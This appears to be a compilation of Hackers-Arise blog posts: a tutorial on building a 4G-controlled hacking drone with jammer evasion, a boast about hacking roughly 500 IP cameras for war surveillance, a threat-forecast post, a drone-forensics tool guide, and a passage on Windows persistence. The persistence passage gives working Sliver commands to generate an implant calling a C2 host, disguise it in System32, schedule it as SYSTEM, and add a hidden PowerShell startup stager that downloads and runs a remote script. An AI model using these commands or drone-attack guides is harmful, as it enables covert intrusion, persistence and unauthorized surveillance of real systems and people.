Welcome back, aspiring cyberwarriors!

We are really glad to see you back for the second part of this series. In the first article, we explored some of the cheapest and most accessible ways to build your own hacking drone. We looked at practical deployment problems, discussed how difficult stable control can be, and even built small helper scripts to make your life easier. That was your first step into this subject where drones become independent cyber platforms instead of just flying gadgets. 

We came to the conclusion that the best way to manage our drone would be via 4G. Currently, in 2026, Russia is adapting a new strategy in which it is switching to 4G to control drones. An example of this is the family of Shahed drones. These drones are generally built as long-range, loitering attack platforms that use pre-programmed navigation systems, and initially they relied only on satellite guidance to reach their targets rather than on a constant 4G data link. However, in some reported variants, cellular connectivity was used to support telemetry and control-related functionality.

In recent years, Russia has been observed modifying these drones to carry different types of payloads and weapons, including missiles and MANPADS (Man-Portable Air-Defense System) mounted onto the airframe. The same principle applies here as with other drones. Once you are no longer restricted to a short-range Wi-Fi control link and move to longer-range communication options, your main limitation becomes power. In other words, the energy source ultimately defines how long the aircraft can stay in the air.

Today, we will go further. In this part, we are going to remove the smartphone from the back of the drone to reduce weight. The free space will instead be used for chipsets and antennas.

4G > UART > Drone

In the previous part, you may have asked yourself why an attacker would try to remotely connect to a drone through its obvious control interfaces, such as Wi-Fi. Why not simply connect directly to the flight controller and bypass the standard communication layers altogether? In the world of consumer-ready drones, you will quickly meet the same obstacle over and over again. These drones usually run closed proprietary control protocols. Before you can talk to them directly, you first need to reverse engineer how everything works, which is neither simple nor fast.

However, there is another world of open-source drone-control platforms. These include projects such as Betaflight, iNav, and Ardupilot. The simplest of these, Betaflight, supports direct control-motor command transmission over UART. If you have ever worked with microcontrollers, UART will feel familiar. The beauty here is that once a drone listens over UART, it can be controlled by almost any small Linux single-board computer. All you need to do is connect a 4G module and configure a VPN, and suddenly you have a controllable airborne hacking robot that is reachable from anywhere with mobile coverage. Working with open systems really is a pleasure because nothing is truly hidden.

So, what does the hacker need? The first requirement is a tiny and lightweight single-board computer, paired with a compact 4G modem. A very convenient combination is the NanoPi Neo Air together with the Sim7600G module. Both are extremely small and almost the same size, which makes mounting easier.

The NanoPi communicates with the 4G modem over UART. It actually has three UART interfaces. One UART can be used exclusively for Internet connectivity, and another one can be used for controlling the drone flight controller. The pin layout looks complicated at first, but once you understand which UART maps to which pins, the wiring becomes straightforward.

After some careful soldering, the finished 4G control module will look like this:

Even very simple flight controllers usually support at least two UART ports. One of these is normally already connected to the drone’s traditional radio receiver, while the second one remains available. This second UART can be connected to the NanoPi. The wiring process is exactly the same as adding a normal RC receiver.

The advantage of this approach is flexibility. You can seamlessly switch between control modes through software settings rather than physically rewiring connectors. You attach the NanoPi and Sim7600G, connect the cable, configure the protocol, and the drone now supports 4G-based remote control.

Depending on your drone’s layout, the board can be mounted under the frame, inside the body, or even inside 3D-printed brackets. Once the hardware is complete, it is time to move into software. The NanoPi is convenient because, when powered, it exposes a USB-based console. You do not even need a monitor. Just run a terminal such as:

nanoPi >  minicom -D /dev/ttyACM0 -b 9600

Then disable services that you do not need:

nanoPi >  systemctl disable wpa_supplicant.service

nanoPi >  systemctl disable NetworkManager.service

Enable the correct UART interfaces with:

nanoPi >  armbian-config

From the System menu you go to Hardware and enable UART1 and UART2, then reboot.

Next, install your toolkit:

nanoPi >  apt install minicom openvpn python3-pip cvlc

Minicom is useful for quickly checking UART traffic. For example, check modem communication like this:

minicom -D /dev/ttyS1 -b 115200
AT

If all is well, then you need to config files for the modem. The first one goes to /etc/ppp/peers/telecom. Replace “telecom” with the name of the cellular provider you are going to use to establish 4G connection.

And the second one goes to /etc/chatscripts/gprs

To activate 4G connectivity, you can run:

nanoPi >  pon telecom

Once you confirm connectivity using ping, you should enable automatic startup using the interfaces file. Open /etc/network/interfaces and add these lines:

auto telecom
iface telecom inet ppp
provider telecom

Now comes the logical connectivity layer. To ensure you can always reach the drone securely, connect it to a central VPN server:

nanoPi > cp your_vds.ovpn /etc/openvpn/client/vds.conf

nanoPi > systemctl enable openvpn-client@vds

This allows your drone to “phone home” every time it powers on.

Next, you must control the drone motors. Flight controllers speak many logical control languages, but with UART the easiest option is the MSP protocol. We install a Python library for working with it:

NanoPi > cd /opt/; git clone https://github.com/alduxvm/pyMultiWii

NanoPi > pip3 install pyserial

The protocol is quite simple, and the library itself only requires knowing the port number. The NanoPi is connected to the drone’s flight controller via UART2, which corresponds to the ttyS2 port. Once you have the port, you can start sending values for the main channels: roll, propeller RPM/throttle, and so on, as well as auxiliary channels:

Find the script on our GitHub and place the it in ~/src/ named as control.py

The NanoPi uses UART2 for drone communication, which maps to ttyS2. You send MSP commands containing throttle, pitch, roll, yaw, and auxiliary values. An important detail is that the flight controller expects constant updates. Even if the drone is idle on the ground, neutral values must continue to be transmitted. If this stops, the controller assumes communication loss. The flight controller must also be told that MSP data is coming through UART2. In Betaflight Configurator you assign UART2 to MSP mode.

We are switching the active UART for the receiver (the NanoPi is connected to UART2 on the flight controller, while the stock receiver is connected to UART1). Next we go to Connection and select MSP as the control protocol.

If configured properly, you now have a drone that you can control over unlimited distance as long as mobile coverage exists and your battery holds out. For video streaming, connect a DVP camera to the NanoPi and stream using VLC like this:

cvlc v4l2:///dev/video0:chroma=h264:width=800:height= \
--sout '#transcode{vcodec=h264,acodec=mp3,samplerate=44100}:std{access=http,mux=ffmpeg{mux=flv},dst=0.0.0.0:8080}' -vvv

The live feed becomes available at:

http://drone:8080/

Here “drone” is the VPN IP address of the NanoPi.

To make piloting practical, you still need a control interface. One method is to use a real transmitter such as EdgeTX acting as a HID device. Another approach is to create a small JavaScript web app that reads keyboard or touchscreen input and sends commands via WebSockets. If you prefer Ardupilot, there are even ready-made control stacks.

By now, your drone is more than a toy. It is a remotely accessible cyber platform operating anywhere there is mobile coverage.

Protection Against Jammers

Previously we discussed how buildings and range limitations affect RF-based drone control. With mobile-controlled drones, cellular towers actually become allies instead of obstacles. However, drones can face anti-drone jammers. Most jammers block the 2.4 GHz band, because many consumer drones use this range. Higher end jammers also attack 800-900 MHz and 2.4 GHz used by RC systems like TBS, ELRS, and FRSKY. The most common method though is GPS jamming and spoofing. Spoofing lets an attacker broadcast fake satellite signals so the drone believes false coordinates. Since drone communication links are normally encrypted, GPS becomes the weak point. That means a cautious attacker may prefer to disable GPS completely. Luckily, on many open systems such as Betaflight drones or FPV cinewhoops, GPS is optional. Indoor drones usually do not use GPS anyway.

As for mobile-controlled drones, jamming becomes significantly more difficult. To cut the drone off completely, the defender must jam all relevant 4G, 3G, and 2G bands across multiple frequencies. If 4G is jammed, the modem falls back to 3G. If 3G goes down, it falls back to 2G. This layering makes mobile-controlled drones surprisingly resilient. Of course, extremely powerful directional RF weapons exist that wipe out all local radio communication when aimed precisely. But these tools are expensive and require high accuracy.

Summary

We transformed the drone into a fully independent device capable of long-range remote operation via mobile networks. The smartphone was replaced with a NanoPi Neo Air and a Sim7600G 4G modem, routed UART communication directly into the flight controller, and configured MSP-based command delivery. We also explored VPN connectivity, video streaming, and modern control interfaces ranging from RC transmitters to browser-based tools. Open-source flight controllers give us incredible flexibility.

In Part 3, we will build the attacking part and carry out our first wireless attack.

If you like the work we’re doing here and want to take your skills even further, we also offer a full SDR for Hackers Career Path. It’s a structured training program designed to guide you from the fundamentals of Software-Defined Radio all the way to advanced, real-world applications in cybersecurity and signals intelligence. 

Welcome back, my cyberwarriors!

This article was first published at Hackers-Arise in April 2022, just 2 months after the Russians invaded in Ukraine.

At the request of the IT Army of Ukraine, we were asked to help the war efforts by hacking a large number of IP cameras within Ukrainian territory. In this way, we can watch and surveil the Russian army in those areas. Should they commit further atrocities (we certainly pray they will not), we should be able to capture that on video and use it in the International Criminal Court. At the very least, we hope the word goes out to the Russian soldiers that we are watching and that constrains their brutality.

In a collaborative effort, our team (you all) has been able to hack into a very large number. We have nearly 500, and we are working on the remainder.

Here is a sampling of some of the cameras we now own for surveillance in Russia and Ukraine.

              

To learn more about hacking IP cameras, become a Subscriber Pro and attend our IP Camera Hacking training.

Welcome back, aspiring cyberwarriors!

I want you to imagine a scene for a moment. You are sitting at your keyboard on one of the upper floors of a secure building in the middle of a restricted area. There is a tall fence topped with electrified barbed wire. Cameras cover every angle. Security guards patrol with confidence. You feel untouchable. Then you hear it. It’s a faint buzzing sound outside the window. You glance over for just a moment, wondering what it is. That tiny distraction is enough. In those few seconds, a small device silently installs a backdoor on your workstation. Somewhere 20 kilometers away, a hacker now has a path into the corporate network. 

That may sound like something out of a movie, but it is not science fiction. In this series, we are going to walk through the process of building a drone that can perform wireless attacks such as EAP attacks, MouseJack, Kismet reconnaissance, and similar operations. A drone is an incredibly powerful tool in the hands of a malicious actor because it can carry roughly a third of its own weight as payload. But “hacking through the air” is not easy. A proper hacker drone must be autonomous, controllable over a secure channel at long distances, and resilient to jamming or suppression systems. Today we will talk through how such drones are designed and how they can be built from readily available components.

Most wireless attacks require the attacker to be physically near the target. The problem is that you can’t reach every building, every fenced facility, and every rooftop. A drone changes the entire equation. It can fly under windows, slip through partially open spaces, or even be transported inside a parcel. As a boxed payload moves through residential or office buildings, it can quietly perform wireless attacks without anyone ever suspecting what is inside. And yes, drones are used this way in the real world, including military and intelligence operations. On June 1, 2025, over 100 FPV drones that were smuggled into Russia, were concealed in modified wooden cabins on trucks, and remotely launched from positions near multiple Russian airbases. These drones conducted precision strikes on parked aircraft at bases including Belaya, Dyagilevo, Ivanovo Severny, Olenya, and Ukrainka, reportedly damaging or destroying more than 40 strategic bombers and other high-value assets.

The FPV drones were equipped with mobile modems using Russian SIM cards to connect to local 3G/4G cellular networks inside Russia. This setup enabled remote operators in Ukraine to receive real-time high-resolution video feeds and telemetry, as well as maintain manual control over the drones via software like ArduPilot Mission Planner. The cellular connection allowed precise piloting from thousands of kilometers away, bypassing traditional radio frequency limitations and Russian electronic warfare jamming in some cases. In Part 2 we will show you how this type of connection can be established.

Drones are everywhere. They are affordable. They are also flexible. But what can they really do for a hacker? The key strength of a drone is that it can carry almost anything lightweight. This instantly increases the operational range of wireless attacks, allowing equipment to quickly and silently reach places a human cannot. A drone can scale fences, reach high-rise windows, hover near targets, and potentially enter buildings. All while remaining difficult to trace. That is an enormous advantage.

Let’s start learning how the platform works.

Implementation

Most drones are radio-controlled, but the exact communication method varies. One channel is used to receive operator commands (RX) and another to transmit video and telemetry back to the operator (TX). Different drones use different communication combinations, such as dedicated radio systems like FRSKY, ELRS, or TBS for control, and either analog or digital channels for video. Some consumer drones use Wi-Fi for telemetry or even control both ways.

For a hacker, the drone is first and foremost a transport platform. It must be reliable and durable. When you are performing attacks near buildings, lamp posts, tight corridors, or window frames, high speed becomes far less important than protecting the propellers. This is why Cinewhoop-style drones with protective frames are such a strong choice. If the drone brushes a wall, the frame absorbs the impact and keeps it flying. You can find the 3D models of it here

The drone also needs enough lifting power to carry your hacking gear. Ideally at least one-third of its own weight. That allows you to attach devices such as Wi-Fi attack platforms, SDR tools, or compact computers without stressing the motors. Because distance matters, Wi-Fi-controlled drones are usually not ideal. Wi-Fi range is typically around 50–100 meters before responsiveness begins to degrade. Professional long-range drones that use dedicated control radios like FRSKY, ELRS, or TBS are a better fit. Under good conditions, these systems can maintain control several kilometers away. Since attackers typically operate near structures, precise control is critical. FPV drones are especially useful here. They allow the pilot to “see” through the drone’s camera in real time, which is essential when maneuvering near buildings or through tight openings. Open-source flight controller platforms such as Betaflight are really attractive. They are flexible, modifiable, and easy to service. If the frame is damaged in a crash, most of the core components can be reused.

In truth, the specific drone model is less important than the pilot’s skill. Good piloting matters. Before we look at attacks, we need to understand how control can be improved and how it can be extended beyond visual range.

Control via 4G

Flying a drone among urban buildings introduces challenges like concrete and steel obstruct radio signals, limiting line-of-sight range. Even if your drone has a long-range radio system, once it disappears behind a building, control becomes unreliable. But what if you could control the drone over mobile networks instead? Modern 4G cellular networks now offer reliable data coverage even inside many urban structures. If we can use cellular data as a control channel, the drone’s reachable range becomes limited only by its battery life, not by line-of-sight. Today’s 4G networks can provide sufficient bandwidth for both control signals and video feeds. Although the latency and responsiveness are not as good as dedicated radio links, they are quite usable for piloting a drone in many scenarios. Considering that drones can reach speeds up to 200 km/h and have flight times measured in tens of minutes, an attacker theoretically could operate a drone more than 20 km away from the controller using 4G connectivity.

4G > Wi-Fi Gateway > Drone

The simplest way to use 4G connectivity is to bridge it to the drone’s Wi-Fi interface. Most consumer drones broadcast a Wi-Fi access point that a mobile phone connects to for control. Commands are sent over UDP packets, and video is streamed back as an RTSP feed. In this setup, the drone already acts like a networked device. If you attach a small computing device with a 4G modem, you could connect to it over a VPN from anywhere, and relay commands to the drone. But this approach has major drawbacks. The control protocol is often closed and proprietary, making it difficult to reverse-engineer and properly relay. Additionally, these protocols send frequent packets to maintain responsiveness, which would saturate your 4G channel and compete with video transmission.

4G > Video Gateway > Drone

A much cleaner alternative is to use a video gateway approach. Instead of trying to tunnel the drone’s native protocol over the cellular link, you attach a small smartphone to the drone and connect it to the drone’s Wi-Fi. The phone itself becomes a bridge. It controls the drone locally and receives video. From the remote operator’s perspective, you are simply remoting into the phone, much like remote controlling any computer. The phone’s screen shows the drone’s video feed, and the operator interacts with the virtual sticks via remote desktop software. The phone app already handles control packet encoding, so there’s no need to reverse-engineer proprietary protocols.

This clever hack solves multiple problems at once. The phone maintains a strong local Wi-Fi link to the drone, which is hard to jam at such short range. The operator sees a video feed that survives 4G network variations better than high-bandwidth native streams. And because the app handles stick input, the operator doesn’t need to worry about throttle, roll, pitch, or yaw encoding.

You can connect to the phone over 4G from any device using remote-access software like AnyDesk. With simple GUI automation tools, you can bind keyboard keys to virtual controller actions on the phone screen.

Here is the Bash script that will help with it. You can find the link to it here

This Bash script allows you to control virtual joysticks once you connect via AnyDesk to the phone. You will use the keyboard to simulate mouse actions. When launched, the script identifies the emulator window (using xwininfo, which requires you to click on the window once), calculates the centers of the left and right virtual sticks based on fixed offsets from the window’s corner, and then enters a loop waiting for single key presses.

For each key (A/B for throttle, W/S/A/D for pitch and roll, Q/E for yaw), the script uses xdotool to move the cursor to the virtual stick, simulate a short swipe in the desired direction, and release. This effectively mimics a touchscreen joystick movement. The script runs on Linux with X11 (Xorg), requires xdotool and x11-utils, and gives a simple keyboard-based alternative for drone control when a physical gamepad isn’t available. Although Kali Linux is not suitable here, many other distros such as Debian Stable, antiX, Devuan, Linux Mint, openSUSE, Zorin OS, or Peppermint OS work well. So while Kali is often the go-to for security work, there’s still a list of usable operating systems.

Telemetry data is also available to the remote operator.

In the system we describe, another script monitors screen regions where telemetry values are displayed, uses OCR (optical character recognition) to extract numbers, and can then process them.

Here is another bash script that will help us with this. It will repeatedly screenshot a selected drone ground control window, crop out the battery and altitude display areas, use OCR to extract the numeric values, print them to the terminal, and speak a “low battery” warning if the percentage drops below 10%..

Find it on our GitHub here

With control and telemetry automated, full 4G-based drone operation becomes extremely flexible. This method is easy to implement and immediately gives you both control and status feedback. However, it does introduce an extra link, which is the Wi-Fi phone. The phone’s Wi-Fi signal may interfere with the drone’s normal operation, and the drone must carry some extra weight (about 50 grams) for this setup. In Part 2, we will go further. We will move from 4G > Wi-Fi > Drone to 4G > UART > Drone, using a custom VPN and SIM. That means the phone disappears completely, and commands are sent directly to the flight controller and motor control hardware. This will give us more flexibility.

That brings us to the end of Part 1.

Summary

Drones are rapidly transforming from hobby toys into serious tools across warfare, policing, intelligence, and hacking. A drone can slip past fences, scale buildings, hover near windows, and quietly deliver wireless attack platforms into places humans cannot reach. It opens doors to an enormous spectrum of radio-based attacks, from Wi-Fi exploitation to Bluetooth hijacking and beyond. For attackers, it means unprecedented reach. 

See you in Part 2 where we begin preparing the drone for real-world offensive operations

The post Drone Hacking: Build Your Own Hacking Drone, Part 1 first appeared on Hackers Arise.

Welcome back, my aspiring cyberwarriors!

As we enter 2026, cybersecurity will be among the most important issues your organization, and our society, will face. Let’s take moment to review the most important issues we will be facing to help you better prepare.

Rather than leveling off or declining, cyber attacks continue at an unprecedented pace. Recent trends and technological developments can help to inform us as to the nature of attacks in 2026.

Let’s take a look.

AI as Both Weapon, Shield, and Force Multiplier

Artificial intelligence is changing the way all of us work and that applies to your cyber adversaries as well. Hackers are quickly adapting to the new AI environment, leveraging its speed and scale to enhance their attacks. At the same time, organizations are deploying AI to detect threats, predictive modelling, and automated responses. In both cases, Artificial Intelligence (AI) becomes a force-multiplier enabling both sides to do more with less.

In 2026, we will certainly see more AI generated threats and those organizations who refuse to use AI to defend their networks and assets will likely not be here to enjoy 2027.

SCADA/ICS/OT Vulnerabilities

Industrial systems (SCADA/ICS/OT) will continue to be key targets in 2026. These systems have benefited from security through obscurity for decades, but now that the attackers understand how poorly secured these systems are, the attacks will accelerate.

Some of the key issues identified by this industry include:

1. 47% SCADA/ICS/OT companies cite gaps in the skillsets and resources necessary to protect their systems.
2. 41% identify lack of network segmentation between OT/IIoT and IT environments as key challenges.

Critical infrastructure systems remain particularly vulnerable to sophisticated attacks. Over 200 proprietary protocols not found among the TCP/IP stack makes this field particularly challenging, while being among the most important to national security.

Internet of Things (IoT)

IoT is growing exponentially while the security of these devices is stuck in a crawl. In 2026, these devices will be increasingly used as a vector to compromise devices within the home network (phones, computers, other IoT) and as an element of a larger botnet, used to perpetuate the largest DDoS attacks in history (this is an easy prediction to make as IoT every year is responsible for the largest DDoS attacks in history). IoT increases every person’s attack surface and the greater the attack surface, the greater the probability of compromise.

Unless the IoT industry implements some basic standards of security, in 2026 the world will become a much more dangerous place.

Identity Management

Identity management is crucial in cybersecurity because it controls who has access to your systems and data.Without strong identity management, you’re essentially leaving the keys under the doormat—even the best perimeter security becomes ineffective when you can’t verify and control who’s inside your system. Artificial intelligence (AI) will make identity management even more challenging in 2026 as attackers use;

1. Deep fakes and synthetic identities including fake voices, videos, images. This will make such identity management systems as biometrics less reliable.
2. Social engineering will be enhanced by enabling the attacker to personalize phishing attacks by replicating the writing style, voice, or social media presence of a trusted colleague.
3. As AI-generated content becomes increasingly ubiquitous, it will become harder and harder to distinguish between AI agents and real humans.

2026 may be the year you will need to implement AI to determine if someone is actually a human.

Cloud Security Complexity

Cloud is the top cybersecurity threat organizations feel least prepared to manage. Multi-cloud environments face sophisticated malware, insider threats, mis-configurations, and supply chain vulnerabilities. Organizations are struggling with “tool sprawl”—managing dozens of separate security tools that create blind spots and conflicting configurations.

Quantum Computing Threats

Quantum computing is coming! Probably not in 2026, but on the near horizon the threat looms of quantum computing breaking your encryption. Quantum computers can easily break the most widely used asymmetric cryptography and 2026 should be the year you begin to prepare with quantum-resistant devices and cryptography.

Geopolitical Impact

Wars are raging around the planet and these conflicts will lead to additional geopolitical risk. Some 60% of business and tech leaders rank cyber risk investment in their top three strategic priorities in response to ongoing geopolitical uncertainty. State-sponsored cyberattacks, disrupted supply chains, fractured alliances, and telecom infrastructure vulnerabilities are reshaping threat landscapes and business strategies.

Ransomware Evolution

Ransomware-as-a-Service (RaaS) is making sophisticated attacks more accessible. AI-driven ransomware can instantly detect vulnerabilities with increased focus on vital industries like finance, healthcare, and energy. The average data breach cost has reached $4.4 million in 2025.

Multi-stage ransomware with data theft, harassment, and long‑tail extortion remains the most disruptive form of cybercrime, and we predict record incident volumes projected into 2026.

Cybercrime ecosystems are moving more of their infrastructure and monetization on‑chain (crypto, mixers, DeFi), making take-down and attribution harder and enabling more resilient RaaS affiliate models.

Talent and Skills Shortages

Workforce gaps remain a critical barrier. Knowledge and skills shortages are the top obstacles to implementing AI-enabled cyber defense. Over half of all organizations are turning to AI tools and managed security services to compensate for missing expertise.

Remote Work Security

With hybrid work as the default, securing remote access has become paramount. Cyber criminals are exploiting remote sessions through phishing, credential theft, and AI-powered impersonation attacks, expanding the attack surface of your organization significantly.

Proactive resilience and continuous adaptation are no longer optional but essential for survival in 2026’s threat landscape.

Physical Security

If you attacker is within your perimeter defenses, GAME OVER! An attacker who can enter your facility and sit down to a computer may be one of the least anticipated attacks. This applies to the disgruntled insider as well. You can have the very best perimeter defenses, but if the attacker is inside your walls, that will all be for naught.

In 2026, make certain to secure your physical perimeter and test all your systems against such as attacks as RFID smart card attacks and social engineering.

Summary

We predict that 2026 will be another very challenging year for those of us cybersecurity. It is essential that you understand the coming threats and the methods to the thwart them. Hackers-Arise will address each of these issues in 2026 both in this blog and in our 2026 trainings.

Join us to advance your cybersecurity career!

The post What Will Be Key Cybersecurity Issues in 2026? first appeared on Hackers Arise.

Welcome back, aspiring digital investigators!

Over the last few years, drones have moved from being niche gadgets to becoming one of the most influential technologies on the modern battlefield and far beyond it. The war in Ukraine accelerated this shift dramatically. During the conflict, drones evolved at an incredible pace, transforming from simple reconnaissance tools into precision strike platforms, electronic warfare assets, and logistics tools. This rapid adoption did not stop with military forces. Criminal organizations, including cartels and smuggling networks, quickly recognized the potential of drones for surveillance and contraband delivery. As drones became cheaper, more capable, and easier to modify, their use expanded into both legal and illegal activities. This created a clear need for digital forensics specialists who can analyze captured drones and extract meaningful information from them.

Modern drones are packed with memory chips, sensors, logs, and media files. Each of these components can tell a story about where the drone has been, how it was used, and who may have been controlling it. At its core, digital forensics is about understanding devices that store data. If something has memory, it can be examined.

U.S. Department of Defense Drone Dominance Initiative

Recognizing how critical drones have become, the United States government launched a major initiative focused on drone development and deployment. Secretary of War Pete Hegseth announced a one-billion-dollar “drone dominance” program aimed at equipping the U.S. military with large numbers of cheap, scalable attack drones.

Modern conflicts have shown that it makes little sense to shoot down inexpensive drones using missiles that cost millions of dollars. The program focuses on producing tens of thousands of small drones by 2026 and hundreds of thousands by 2027. The focus has shifted away from a quality-over-quantity mindset toward deploying unmanned systems at scale. Analysts must be prepared to examine drone hardware and data just as routinely as laptops, phones, or servers.

Drone Platforms and Their Operational Roles

Not all drones are built for the same mission. Different models serve very specific roles depending on their design, range, payload, and level of control. On the battlefield, FPV drones are often used as precision strike weapons. These drones are lightweight, fast, and manually piloted in real time, allowing operators to guide them directly into high-value targets. Footage from Ukraine shows drones intercepting and destroying larger systems, including loitering munitions carrying explosive payloads.

To counter electronic warfare and jamming, many battlefield drones are now launched using thin fiber optic cables instead of radio signals. These cables physically connect the drone to the operator, making jamming ineffective. In heavily contested areas, forests are often covered with discarded fiber optic lines, forming spider-web-like patterns that reflect sunlight. Images from regions such as Kupiansk show how widespread this technique has become.

Outside of combat zones, drones serve entirely different purposes. Commercial drones are used for photography, mapping, agriculture, and infrastructure inspection. Criminal groups may use similar platforms for smuggling, reconnaissance, or intimidation. Each use case leaves behind different types of forensic evidence, which is why understanding drone models and their intended roles is so important during an investigation.

DroneXtractor – A Forensic Toolkit for DJI Drones

To make sense of all this data, we need specialized tools. One such tool is DroneXtractor, an open-source digital forensics suite available on GitHub and written in Golang. DroneXtractor is designed specifically for DJI drones and focuses on extracting and analyzing telemetry, sensor values, and flight data.

The tool allows investigators to visualize flight paths, audit drone activity, and extract data from multiple file formats. It is suitable for law enforcement investigations, military analysis, and incident response scenarios where understanding drone behavior is critical. With this foundation in mind, let us take a closer look at its main features.

Feature 1 – DJI File Parsing

DroneXtractor supports parsing common DJI file formats such as CSV, KML, and GPX. These files often contain flight logs, GPS coordinates, timestamps, altitude data, and other telemetry values recorded during a drone’s operation. The tool allows investigators to extract this information and convert it into alternative formats for easier analysis or sharing.

In practical terms, this feature can help law enforcement reconstruct where a drone was launched, the route it followed, and where it landed. For military analysts, parsed telemetry data can reveal patrol routes, observation points, or staging areas used by adversaries. Even a single flight log can provide valuable insight into patterns of movement and operational habits.

Feature 2 – Steganography

Steganography refers to hiding information within other files, such as images or videos. DroneXtractor includes a steganography suite that can extract telemetry and other embedded data from media captured by DJI drones. This hidden data can then be exported into several different file formats for further examination.

This capability is particularly useful because drone footage often appears harmless at first glance. An image or video shared online may still contain timestamps, unique identifiers and sensor readings embedded within it. For police investigations, this can link media to a specific location or event.

Feature 3 – Telemetry Visualization

Understanding raw numbers can be difficult, which is why visualization matters. DroneXtractor includes tools that generate flight path maps and telemetry graphs. The flight path mapping generator creates a visual map showing where the drone traveled and the route it followed. The telemetry graph visualizer plots sensor values such as altitude, speed, and battery levels over time.

Investigators can clearly show how a drone behaved during a flight, identify unusual movements, or detect signs of manual intervention. Military analysts can use these visual tools to assess mission intent, identify reconnaissance patterns, or confirm whether a drone deviated from its expected route.

Feature 4 – Flight and Integrity Analysis

The flight and integrity analysis feature focuses on detecting anomalies. The tool reviews all recorded telemetry values, calculates expected variance, and checks for suspicious gaps or inconsistencies in the data. These gaps may indicate file corruption, tampering, or attempts to hide certain actions.

Missing data can be just as meaningful as recorded data. Law enforcement can use this feature to determine whether logs were altered after a crime. Military analysts can identify signs of interference and malfunction, helping them assess the reliability of captured drone intelligence.

Usage

DroneXtract is built in Go, so before anything else you need to have Go installed on your system. This makes the tool portable and easy to deploy, even in restricted or offline environments such as incident response labs or field investigations.

We begin by copying the project to our computer

bash# > git clone https://github.com/ANG13T/DroneXtract.git

To build and run DroneXtract from source, you start by enabling Go modules. This allows Go to correctly manage dependencies used by the tool.

bash# > $ export GO111MODULE=on

Next, you fetch all required dependencies defined in the project. This step prepares your environment and ensures all components DroneXtract relies on are available.

bash# >  go get ./…

Once everything is in place, you can launch the tool directly:

bash# > go run main.go

At this point, DroneXtract is ready to be used for parsing files, visualizing telemetry, and performing integrity analysis on DJI drone data. The entire process runs locally, which is important when handling sensitive or classified material.

Airdata Usage

DJI drones store detailed flight information in .TXT flight logs. These files are not immediately usable for forensic analysis, so an intermediate step is required. For this, we rely on Airdata’s Flight Data Analysis tool, which converts DJI logs into standard forensic-friendly formats.

You can find the link here

Once the flight logs are processed through Airdata, the resulting files can be used directly with DroneXtract:

Airdata CSV output files can be used with:

1) the CSV parser

2) the flight path map generator

3) telemetry visualizations

Airdata KML output files can be used with:

1) the KML parser for geographic mapping

Airdata GPX output files can be used with:

1) the GPX parser for navigation-style flight reconstruction

This workflow allows investigators to move from a raw drone log to clear visual and analytical output without reverse-engineering proprietary formats themselves.

Configuration

DroneXtract also provides configuration options that allow you to tailor the analysis to your specific investigation. These settings are stored as environment variables in the .env file and control how much data is processed and how sensitive the analysis should be.

TELEMETRY_VIS_DOWNSAMPLE

This value controls how much telemetry data is sampled for visualization. Higher values reduce detail but improve performance, which is useful when working with very large flight logs.

FLIGHT_MAP_DOWNSAMPLE

This setting affects how many data points are used when generating the flight path map. It helps balance visual clarity with processing speed.

ANALYSIS_DOWNSAMPLE

This value controls the amount of data used during integrity analysis. It allows investigators to focus on meaningful changes without being overwhelmed by noise.

ANALYSIS_MAX_VARIANCE

This defines the maximum acceptable variance between minimum and maximum values during analysis. If this threshold is exceeded, it may indicate abnormal behavior, data corruption, or possible tampering.

Together, these settings give investigators control over both speed and precision, allowing DroneXtract to be effective in fast-paced operational environments and detailed post-incident forensic examinations.

Summary

Drone forensics is still a developing field, but its importance is growing rapidly. As drones become more capable, the need to analyze them effectively will only increase. Tools like DroneXtractor show how much valuable information can be recovered from devices that were once considered disposable. 

Looking ahead, it would be ideal to see fast, offline forensic tools designed specifically for battlefield conditions. Being able to quickly extract flight data, locations, and operational details from captured enemy drones could provide immediate tactical advantages. Drone forensics may soon become as essential as traditional digital forensics on computers and mobile devices.

The post Digital Forensics: Drone Forensics for Battlefield and Criminal Analysis first appeared on Hackers Arise.

“Often, the battle goes not to the strongest, but rather to the most persistent.”

— OTW

In earlier articles, we walked through everything from getting the first C2 online to gaining a foothold on a machine and escalating privileges. Most of the hard work is done. Once you’ve got high-level access, you’re in a strong position, but that doesn’t mean you can relax. What matters now is keeping that access. Connections can drop, processes can be killed, or machines might reboot. Without persistence, all your progress can disappear. In this article, we make sure you can always get back in.

In this article we’re focusing on Windows, but the concept applies everywhere. Persistence is a broad topic. For example, on Linux, crontabs are often used for persistence, and hackers sometimes encode commands in base64 for extra cover. Learning multiple methods is important. The more tools you know, the better you can adapt to different targets.

Payload Generation

When it comes to persistence, an executable is often the easiest option. Essentially, it’s just another implant, like the one you built earlier.

sliver > generate –http <C2_IP> –os windows –arch amd64 –format exe –save /tmp/persist.exe

You can give the file any name, but it shouldn’t stand out. The goal is to make it look like it belongs. Avoid dumping it into places like C:\Temp, which gets cleaned out regularly. Many attackers prefer to use C:\Windows\System32, since admins usually stay away from it out of caution. Some names that blend in well are dllhost.exe, conhost.exe, winlogon.exe, wmiprvse.exe, and msiexec.exe. Just don’t overwrite the real system binaries. For the sake of simplicity, we’ll use a basic name.

Delivery

Once the payload is ready, it has to be delivered to the target. In earlier steps, you learned how to upload files using Sliver:

sliver (session) > upload /tmp/persist.exe C:\\Windows\\System32\\persist.exe

You could reuse the payload from your initial access, but it may already be logged and flagged. It’s safer to create a new one. Also, update the file’s timestamp after uploading it to make it less suspicious.

Scheduled Tasks

Windows Task Scheduler is a common way to maintain access. Sometimes, you’ll find old tasks that can be modified for your needs. That’s ideal since the task already exists and won’t raise suspicion. If there’s nothing useful, you can create your own:sliver (session) > execute schtasks /create /tn “Windows Services and Tasks” /tr “C:\Windows\System32\persist.exe” /sc hourly /mo 6 /ru System

This sets up a task that runs your executable every six hours with SYSTEM privileges. The name “Windows Services and Tasks” helps it blend in. Don’t try to be clever or unique with naming, keep it boring and native.

There’s also a PowerShell way to do this, but spawning PowerShell processes can get you noticed. Some environments log or monitor PowerShell closely. Still, knowing both methods gives you options.

Startup Folder

Sometimes, Russian admins don’t keep antivirus running full-time across all systems. That’s partly because some of those machines rely on cracked or pirated software, which would constantly trigger AV alerts. Instead, they tend to run manual scans from time to time, especially when something looks off. These checks aren’t regular, but when they do happen, anything that stands out, like a dropped payload can easily get flagged and removed.

In that case, using a lightweight stager can help. Here’s how to create one that runs at startup:

sliver (session) > sharpersist — -t startupfolder -c “powershell.exe” -a “-nop -w hidden -Command \”IEX (irm ‘http://<C2_IP>:443/builder.ps1’)\”” -f “EdgeUpdater” -m add

